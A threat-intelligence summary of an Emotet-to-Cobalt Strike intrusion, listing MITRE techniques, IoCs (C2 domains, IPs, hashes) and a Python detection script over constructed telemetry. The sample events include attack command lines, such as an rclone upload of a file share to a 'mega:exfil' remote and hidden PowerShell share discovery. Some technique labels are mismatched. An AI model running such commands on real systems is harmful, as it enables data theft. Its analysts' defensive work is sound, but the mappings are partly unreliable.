May 2022 saw an Emotet-driven intrusion that began with a phishing Excel document and culminated in a domain-wide compromise, Cobalt Strike beaconing, lateral movement, and data exfiltration via Rclone. Emotet has since resurfaced (with TrickBot support) and repeatedly tested access payloads while expanding Cobalt Strike deployments.
#Emotet #CobaltStrike
Keypoints
- The intrusion started from a phishing email delivering a zip archive; the Excel (xls) document inside carried a malicious macro that provided initial access.
- Emotet executed to perform basic discovery, persisted via a registry Run key, and established C2 with a Cobalt Strike beacon on the beachhead host.
- Within hours, Emotet launched an email-spreader campaign while the Cobalt Strike beacon enabled network enumeration, credential dumping, and lateral movement.
- Threat actors dumped LSASS, used Pass-the-Hash, and performed domain and account discovery with tools like AdFind, Invoke-ShareFinder, and Kerberoasting.
- Pivoting to the Domain Controller enabled further credential access, domain admin group enumeration, and installation of additional persistence/tools (Atera/Splashtop).
- Exfiltration used Rclone to upload sensitive data to MEGA.cloud, with evidence of double exfiltration from two hosts and SMB share activity observed in Zeek logs.
- Despite a high-risk scenario, the case concluded with eviction by authorities before ransomware was deployed; subsequent activity suggested Emotet’s ongoing evolution with Cobalt Strike.
MITRE Techniques
- [T1566.001] Phishing – The intrusion began after a user opened an Excel document and enabled macros. “Back in May, we witnessed an intrusion that started from a phishing email which included Emotet.”
- [T1117] Regsvr32 – After the obfuscated macro ran, Emotet used regsvr32.exe to load the payload hvxda.ocx: “The execution is done from an Excel document using regsvr32.exe with the payload, hvxda.ocx.”
- [T1105] Ingress Tool Transfer – Emotet downloaded Cobalt Strike via the loader process: “The Emotet DLL is then used to download Cobalt Strike, which is then injected into svchost and dllhost.”
- [T1055.001] Dynamic-link Library Injection – Process injection observed with svchost and other processes to execute payloads: “Process injection was observed during the intrusion by both Emotet and Cobalt Strike.”
- [T1059.001] PowerShell – PowerView and Invoke-ShareFinder used for network discovery: “the hands-on activity … invoked PowerView module, Invoke-Sharefinder.”
- [T1135] Network Share Discovery – Network enumeration via PowerView/Invoke-ShareFinder and subsequent AdFind usage: “Invoke-ShareFinder once again, and Invoke-Kerberoast.”
- [T1018] Remote System Discovery – Active discovery of remote systems during pivot: “Get-System module was also apparent via the logs.”
- [T1069.002] Domain Groups – Discovery and targeting of domain groups like Domain Admins and Enterprise Admins: “net group ‘Domain Admins’ … ‘Domain Computers’.”
- [T1087.002] Domain Accounts – Enumeration of domain accounts and roastable credentials: “Invoke-Kerberoast” for roastable accounts.
- [T1003.001] LSASS Memory – Credential dumping via LSASS memory: “then proceeded to dump credentials from LSASS.”
- [T1558.003] Kerberoasting – Kerberoast performed during lateral movement: “Invoke-Kerberoast.”
- [T1021.002] SMB/Windows Admin Shares – Lateral movement by transferring a Cobalt Strike DLL over SMB and executing via a remote service: “transferring a Cobalt Strike DLL over SMB and executing via a remote service on another workstation.”
- [T1570] Lateral Tool Transfer – Pivoting to the domain controller and deploying tools like AdFind/Atera; batch scripts were used for discovery and movement: “batch script named p.bat to ping all servers.”
- [T1003.003] LSASS Dump – Extended credential access through LSASS dumping on multiple hosts.
- [T1071.001] Web Protocols – Cobalt Strike beacons and Emotet C2 communications over HTTP/HTTPS: “beacon type: [ ‘HTTP’ ], server: { … }”
- [T1059.001] PowerShell – Use of PS-based discovery and tool execution (PowerView/Invoke-ShareFinder) as part of the attack chain.
- [T1547.001] Registry Run Keys / Startup Folder – Persistence on the beachhead via registry Run Key: “The Emotet infection on the beachhead host used a registry run key to maintain persistence.”
- [T1018] Remote System Discovery – Discovery of domain relationships and trusts during domain pivot.
- [T1021.001] Remote Services – Use of psexec-like technique to run remote processes on other hosts: “The Cobalt Strike jump psexec (Run service EXE on the remote host) produced a 7045 System Windows event on remote hosts.”
- [T1567.002] Exfiltration to Cloud Storage – Exfil to MEGA cloud storage using Rclone: “exfiltrate data to MEGA.io cloud storage.”
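As an added illustration (not part of the DFIR Report or of this summary), the following Python sketches detections for several of the techniques listed above and runs them over constructed Sysmon-style process-creation events and a System 7045 service-install event; the field names, file paths, service name and the ADMIN$ heuristic are assumptions, not values from the report.

```python
"""Toy detections for TTPs from the Emotet/Cobalt Strike case, over constructed telemetry."""
import re

# Constructed sample events (not from the report). id 1 = process creation,
# id 7045 = System log service installation. Paths and names are made up.
EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe C:\Users\user\AppData\Local\Temp\hvxda.ocx"},
    {"id": 1, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -w hidden -c Invoke-ShareFinder -CheckShareAccess"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\rclone.exe",
     "cmd": r"rclone.exe copy \\FS01\Finance mega:exfil --config rclone.conf"},
    {"id": 7045, "service": "7c4f2a1", "path": r"\\WS02\ADMIN$\7c4f2a1.exe"},
    # Benign control: regsvr32 from explorer registering a normal DLL.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /s C:\Windows\System32\legit.dll"},
]

def _img(e, name):
    return e["image"].lower().endswith("\\" + name)

# Each rule: (technique label, predicate). Predicates short-circuit on "id" so
# they never touch fields the other event type lacks.
RULES = [
    ("T1117 Regsvr32 loading an .ocx from Excel", lambda e: e["id"] == 1
        and e["parent"].lower().endswith(r"\excel.exe")
        and _img(e, "regsvr32.exe") and ".ocx" in e["cmd"].lower()),
    ("T1059.001 PowerView/Kerberoast in PowerShell", lambda e: e["id"] == 1
        and _img(e, "powershell.exe")
        and re.search(r"invoke-(sharefinder|kerberoast)", e["cmd"], re.I) is not None),
    ("T1567.002 Rclone upload to a cloud remote", lambda e: e["id"] == 1
        and _img(e, "rclone.exe")
        and re.search(r"\b(copy|sync|move)\b.*\s\w+:", e["cmd"], re.I) is not None),
    # Heuristic (assumption): a 7045 whose service binary lives on a UNC admin share.
    ("T1021.002 Service EXE installed from ADMIN$ (7045)", lambda e: e["id"] == 7045
        and re.search(r"^\\\\[^\\]+\\ADMIN\$\\", e["path"], re.I) is not None),
]

def detect(events):
    """Return [(technique_label, event_index)] for every event matching a rule."""
    return [(label, i) for i, e in enumerate(events) for label, rule in RULES if rule(e)]

if __name__ == "__main__":
    for label, i in detect(EVENTS):
        print(f"event {i}: {label}")
```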
Indicators of Compromise
- [File] info_1805.xls – The phishing Excel document listed in the report's indicators, alongside 1.dll and other artifacts.
- [File] 1.dll – One of the DLL payloads observed on the beachhead and across hosts.
- [File] find.bat – Batch script used for AD enumeration and collection.
- [File] p.bat – Batch script used to orchestrate network ping discovery.
- [Hash] adf2b487134ffcd7999e419318dfdf8d – Sample hash listed in indicators.
- [Hash] acd3d4e8f63f52eaf57467a76ca2389d – File hash example from the indicators.
- [Hash] e598b9700e13f2cb1c30c6d9230152ed5716a6d6e25db702576fefeb6638005e – File hash example from the indicators.
- [Domain] praachichemfood.com – Hard-coded command-and-control domain used by the Emotet payloads.
- [Domain] lopespublicidade.com – Alternate C2 domain used by the loader component.
- [Domain] seasidesolutions.com – Additional C2 domain observed in macro code deobfuscated output.
- [IP] 103.133.214.242 – One of the hard-coded IPs Emotet attempted to connect to.
- [IP] 59.95.98.204 – Cobalt Strike C2 host observed in the IoCs with HTTP beacon configuration.
- [IP] 103.8.26.17 – Another stage C2/HTTP beacon IP observed in the traffic.
Read more: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/